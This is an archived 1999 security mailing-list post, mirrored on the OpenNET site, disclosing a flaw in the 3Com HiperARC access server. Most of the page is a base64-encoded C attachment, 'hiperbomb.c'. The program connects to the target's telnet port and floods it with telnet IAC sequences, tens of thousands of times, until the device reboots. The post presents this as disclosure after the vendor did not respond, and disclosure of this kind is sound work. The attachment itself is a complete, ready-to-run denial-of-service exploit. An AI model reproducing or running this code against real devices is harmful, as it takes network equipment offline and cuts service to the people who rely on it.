The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


3com hiperarch flaw [hiperbomb.c]


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: Thu, 12 Aug 1999 18:10:44 -0400
From: Jonathan Chapman <jchapman@1ST.NET.>
To: [email protected]
Subject: 3com hiperarch flaw [hiperbomb.c]

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to [email protected] for more info.

---254732288-1621199452-934495844=:27775
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hello,

The attached program will reboot a 3com HiperARC.  I made an attempt to
contact 3com before posting this report, however, I received no response.
By flooding the telnet port of a 3com HiperARC using the provided program,
the HiperARC unconditionally reboots.  This program is effective over all
interfaces, including a dialup.

Regards,

Jonathan Chapman
Director of Network Security
FIRST Incorporated
[email protected]  www.1st.net


---254732288-1621199452-934495844=:27775
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="hiperbomb.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9908121810440.27775@noc.1st.net.>
Content-Description: Reboots HiperARC [kaboom]
Content-Disposition: attachment; filename="hiperbomb.c"

LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogKiBoaXBlcmJvbWIyLmMg
LSBSZWJvb3RzIEhpcGVyQVJDIGZhc3Rlci4NCiAqIC0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KICogKGMpIDE5OTkgLSBKb25hdGhhbiBDaGFwbWFuIDxq
Y2hhcG1hbkAxc3QubmV0Pg0KICogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
DQogKiBTZW5kcyBhIGhpZ2ggdm9sdW1lIG9mIElBQ3Mgd2hpY2ggZXZlbnR1
YWxseSBsZWFkcyB0byBhIHJlYm9vdCBvZiB0aGUNCiAqIEhpcGVyQVJDLiAg
QnJpZWYgdGVzdGluZyBpbmRpY2F0ZWQgdGhhdCB0aGlzIHByb2JsZW0gaXMg
bW9zdCBsaWtlbHkgDQogKiBzcGVjaWZpYyB0byBzZW5kaW5nIElBQ3MgcmF0
aGVyIHRoYW4gYW55IG90aGVyIHR5cGUgb2YgZGF0YS4gIEZ1cnRoZXINCiAq
IHJlc2VhcmNoIGhhcyBzaG93biB0aGF0IHNwZWNpZmljIElBQyBwYXR0ZXJu
cyBhcmUgbW9yZSBsaWtlbHkgdG8gY2F1c2UNCiAqIGEgcmVib290LiAgSW4g
dGhpcyBleGFtcGxlIEkgdXNlIG9uZSBvZiB0aGUgbW9zdCBlZmZpY2llbnQg
Y29tYmluYXRpb25zDQogKiBJIGhhdmUgZGlzY292ZXJlZC4gIFRocm91Z2gg
bXkgdGVzdGluZyBpdCB1c3VhbGx5IHJlcXVpcmVkIGF0IGxlYXN0DQogKiA2
MCwwMDAgcGFja2V0cyB0byBjYXVzZSB0aGUgSGlwZXJBUkMgdG8gcmVib290
Lg0KICogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQogKi8NCg0KDQojaW5j
bHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzdGRhcmcuaD4NCiNpbmNsdWRl
IDxmY250bC5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8bmV0
aW5ldC9pbi5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCg0KY2hhciAq
Y2hhc3NpczsNCmludCBzb2NrZmQsIG51bV9vZl90cmllczsNCg0Kdm9pZCBj
b25uZWN0X3RvX2NoYXNzaXMoY2hhciAqbmFtZSkNCnsNCiAgICAgICAgc3Ry
dWN0IGhvc3RlbnQgKmhvc3Q7DQogICAgICAgIHN0cnVjdCBzb2NrYWRkcl9p
biByZW1vdGU7DQoNCiAgICAgICAgaG9zdCA9IGdldGhvc3RieW5hbWUobmFt
ZSk7DQoNCiAgICAgICAgaWYoIWhvc3QpIHsNCglmcHJpbnRmKHN0ZGVyciwg
IkNhbm5vdCByZXNvbHZlIGhvc3QgJXMuXG4iLCBuYW1lKTsNCiAgICAgICAg
ZXhpdCgzKTsNCiAgICAgICAgfQ0KDQogICAgICAgIHNvY2tmZCA9IHNvY2tl
dChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCk7DQoNCiAgICAgICAgaWYoc29j
a2ZkIDwgMCkgew0KICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkNhbm5vdCBv
YnRhaW4gZGVzY3JpcHRvci5cbiIpOw0KCWV4aXQoNCk7DQogICAgICAgIH0N
Cg0KICAgICAgICByZW1vdGUuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAg
ICAgIHJlbW90ZS5zaW5fYWRkciA9ICooc3RydWN0IGluX2FkZHIgKikqaG9z
dC0+aF9hZGRyX2xpc3Q7DQogICAgICAgIHJlbW90ZS5zaW5fcG9ydCA9IGh0
b25zKDIzKTsNCg0KICAgICAgICBjb25uZWN0KHNvY2tmZCwgKHN0cnVjdCBz
b2NrYWRkciAqKSZyZW1vdGUsIHNpemVvZihyZW1vdGUpKTsNCg0KCXJldHVy
bjsNCn0NCg0Kdm9pZCBzZW5kX2lhY3MoKQ0Kew0KICAgICAgICB1bnNpZ25l
ZCBjaGFyIHJlcGx5WzNdID0gezI1NCwgMzYsIDE4NX07DQoJdW5zaWduZWQg
aW50IGs7DQoNCiAgICAgICAgZm9yKGsgPSAwOyBrIDwgbnVtX29mX3RyaWVz
OyBrKyspIHsNCiAgICAgICAgd3JpdGUoc29ja2ZkLCByZXBseSwgMyk7DQoJ
fQ0KfQ0KDQppbnQgbWFpbihpbnQgYWMsIGNoYXIgKiphdikNCnsNCg0KICAg
ICAgICBpZihhYyA8IDMpIHsNCiAgICAgICAgZnByaW50ZihzdGRlcnIsICJT
eW50YXg6ICVzIDxjaGFzc2lzIG5hbWU+IDxudW0gb2YgcGFja2V0cz5cbiIs
IGF2WzBdKTsNCglmcHJpbnRmKHN0ZGVyciwgIkFwcHJveGltYXRlbHkgNjAs
MDAwIHBhY2tldHMgdXN1YWxseSB0YWtlcyBjYXJlIG9mIHRoZSBqb2IuXG4i
KTsNCiAgICAgICAgZXhpdCgyKTsNCiAgICAgICAgfQ0KDQogICAgICAgIGNo
YXNzaXMgPSBhdlsxXTsNCgludW1fb2ZfdHJpZXMgPSBhdG9pKGF2WzJdKTsN
Cg0KICAgICAgICBmcHJpbnRmKHN0ZGVyciwgIkJlZ2lubmluZyBhdHRhY2sg
b24gY2hhc3NpcyAlcyBbJWQgcGFja2V0c11cbiIsIA0KCQljaGFzc2lzLCBu
dW1fb2ZfdHJpZXMpOw0KICAgICAgICBjb25uZWN0X3RvX2NoYXNzaXMoY2hh
c3Npcyk7DQogICAgICAgIHNlbmRfaWFjcygpOw0KICAgICAgICBmcHJpbnRm
KHN0ZGVyciwgIkF0dGFjayBjb21wbGV0ZS5cbiIpOw0KDQogICAgICAgIGV4
aXQoMCk7DQp9DQoNCg==
---254732288-1621199452-934495844=:27775--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру